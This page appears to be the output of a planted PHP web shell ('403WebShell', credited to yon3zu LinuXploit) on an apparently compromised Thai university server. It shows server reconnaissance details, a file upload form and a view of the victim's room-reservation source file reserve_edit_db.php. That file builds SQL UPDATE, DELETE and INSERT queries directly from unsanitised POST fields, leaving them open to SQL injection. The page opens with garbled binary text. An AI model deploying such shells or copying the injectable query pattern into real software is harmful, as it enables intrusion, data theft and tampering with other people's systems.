403WebShell

h( )($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms��Sb�,;R''6c2I�!\��kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K��x)1�6@r*2�89ma��&��'ti��{~#��t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1��w�r��l&-t*3�<<�u��#��j&.u��J68\8?"#$%&'()*+,-./0 !
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell403Webshell

Server IP : 10.254.12.21 / Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON | cURL : ON | WGET : OFF | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON
Directory : /var/www/html/trr/pages/

Upload File :

[ Back ]

Current File : /var/www/html/trr/pages/reserve_edit_db.php

<?ob_start();?>
<?php session_start();?>
<?php include 'check_mode_login.php';?>
<?php include 'dbconnect.php';?>
<?php include 'header.php';?>
<?php
if ($_POST["submit_edit_db"])
{
  $reserve_code = (isset($_POST["reserve_code"])) ? $_POST["reserve_code"] : '';
  //$password_check = (isset($_POST["password_check"])) ? $_POST["password_check"] : '';
  //$sqlx = "SELECT * FROM reserve_detail WHERE reserve_code=" . $reserve_code . " AND password='" . $password_check ."'";
  $sqlx = "SELECT * FROM reserve_detail WHERE reserve_code=" . $reserve_code;
  $queryx = mysqli_query($conn,$sqlx);	
  if($resultx=mysqli_fetch_array($queryx,MYSQLI_ASSOC)) { 	
    if ($resultx["user_name"] == $_SESSION['USERNAME_arit67']) { //user ตรงมั้ย  
		//$room_code = (isset($_POST["room_code"])) ? $_POST["room_code"] : '';
		//$reserve_date = (isset($_POST["reserve_date"])) ? $_POST["reserve_date"] : '';
		$room_code = $resultx["room_code"];
		//$prefix_id = (isset($_POST["prefix_id"])) ? $_POST["prefix_id"] : '';
		//$firstname = (isset($_POST["firstname"])) ? $_POST["firstname"] : '';
		//$lastname = (isset($_POST["lastname"])) ? $_POST["lastname"] : '';
		//$faculty_id = (isset($_POST["faculty_id"])) ? $_POST["faculty_id"] : '';
		$phone = (isset($_POST["phone"])) ? $_POST["phone"] : '';
		//$email = (isset($_POST["email"])) ? $_POST["email"] : '';
		$subject = (isset($_POST["subject"])) ? $_POST["subject"] : '';
		$note = (isset($_POST["note"])) ? $_POST["note"] : '';
		//$password = (isset($_POST["password"])) ? $_POST["password"] : '';
		/*if (!is_numeric($_POST["num_student"])) {
			$num_student = 0;	
		} else { //if (!is_numeric($_POST["num_student"])) {
			$num_student = $_POST["num_student"];
		} //if (!is_numeric($_POST["num_student"])) {*/
	
		//if (($prefix_id<>"") && ($firstname<>"") && ($lastname<>"") && ($faculty_id<>"") && ($phone<>"") && ($email<>"") && ($password<>"") ) {
		  //ตรวจสอบว่าเลือกเวลาแล้วยัง
		  $select_time_ok = 0;
		  $sql = "SELECT time_code FROM reserve_time_list ORDER BY time_code ASC";
		  $query = mysqli_query($conn,$sql);	
		  while($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
		   $input_name = "pid" . $result["time_code"];
		   if (isset($_POST[$input_name])) {
			$select_time_ok = 1;
			break;
		   } //if (isset($_POST[$input_name])) {
		  }	//while($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
		  if ($select_time_ok == 1) {
				//บันทึกลงในตาราง reserve_detail
				$sql = "UPDATE reserve_detail ";
				//$sql .= "SET firstname='" . $firstname . "',";
				//$sql .= "lastname='" . $lastname . "',";
				//$sql .= "prefix_id=" . $prefix_id . ",";
				//$sql .= "faculty_id=" . $faculty_id . ",";
				$sql .= "SET phone='" . $phone . "',";
				//$sql .= "email='" . $email . "',";
				//$sql .= "password='" . $password . "',";
				$sql .= "subject='" . $subject . "',";
				//$sql .= "num_student=" . $num_student . ",";
				$sql .= "note='" . $note . "' ";
				$sql .= " WHERE reserve_code=" . $reserve_code;
				$query = mysqli_query($conn,$sql);
				if($query) {
					//บันทึกลงในตาราง reserve_time
					//ลบเวลาที่จองเดิมออกก่อน
					$sql = "DELETE FROM reserve_time WHERE reserve_code=" . $reserve_code;
					$query = mysqli_query($conn,$sql);	
					if($query) {
						//เพิ่มเวลาที่เลือกใหม่เข้าไป
						$sql = "SELECT time_code FROM reserve_time_list ORDER BY time_code ASC";
						$query = mysqli_query($conn,$sql);	
						while($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {
							$input_name = "pid" . $result["time_code"];
							if (isset($_POST[$input_name])) {
								$sql2 = "INSERT INTO reserve_time ";
								$sql2 .="(reserve_code,reserve_time) ";
								$sql2 .="VALUES ";
								$sql2 .="(". $reserve_code . " ";
								$sql2 .="," . $_POST[$input_name] . ") ";
								$query2 = mysqli_query($conn,$sql2);
								if (!$query2) {
									echo "ไม่สามารถเพิ่มเวลาที่เลือกได้";
								} //if (!$query2) {
							} //if (isset($_POST[$input_name])) {
						} //while($result=mysqli_fetch_array($query,MYSQLI_ASSOC)) {	
	
		
								
					} else { //if($query) {
						echo "ไม่สามารถลบเวลาเดิมได้";
					} //if($query) {
	?>							
		<BR />บันทึกข้อมูลเรียบร้อยแล้ว
		<BR /><BR /><a href="index.php#<?php echo $room_code;?>"><button type="button" class="btn-success">คลิกที่นี่เพื่อดูรายการจอง</button></a>
	<?php				
					//echo "บันทึกข้อมูลแล้ว";
					//$redirect_url = "index.php#" . $room_code;
					//header("location:$redirect_url");
				} else { //if($query) {
					echo "ไม่สามารถบันทึกข้อมูลได้";
				} //if($query) {	
		  } else { //if ($select_time_ok == 1) {
	?>
		<BR />กรุณาเลือกการช่วงเวลาที่ต้องการจอง
		<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
	<?php	  
		  } //if ($select_time_ok == 1) {
		/*} else { //	if (($room_code<>"") && ($<reserve_date>"") && ($prefix_id<>"") && ($firstname<>"") && ($lastname<>"") && ($faculty<>"") && ($phone<>"") && ($email<>""))
	?>	
		<BR />กรุณากรอกข้อมูลให้ครบถ้วน
		<BR /><BR /><a href='javascript:history.back(1);'><button type="button" class="btn-warning">คลิกที่นี่เพื่อกลับไปหน้าที่แล้ว</button></a>
	
	<?php
		}  //	if (($room_code<>"") && ($<reserve_date>"") && ($prefix_id<>"") && ($firstname<>"") && ($lastname<>"") && ($faculty<>"") && ($phone<>"") && ($email<>""))*/

	} else { //if ($result["user_name"] == $_SESSION['USERNAME_arit67']) { //user ตรงมั้ย
?>
		<h1><font color="#FF0000">ไม่สามารถแก้ไขรายละเอียดการจองได้ ผู้ที่ทำการจองเท่านั้นที่จะแก้ไขรายละเอียดการจองได้</font></h1>
<?php
	} //if ($result["user_name"] == $_SESSION['USERNAME_arit67']) { //user ตรงมั้ย
  } else { //if($resultx=mysqli_fetch_array($queryx,MYSQLI_ASSOC))
  	echo "ไม่พบข้อมูลการจอง";
  }
} //if ($_POST["submit"])
?>

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit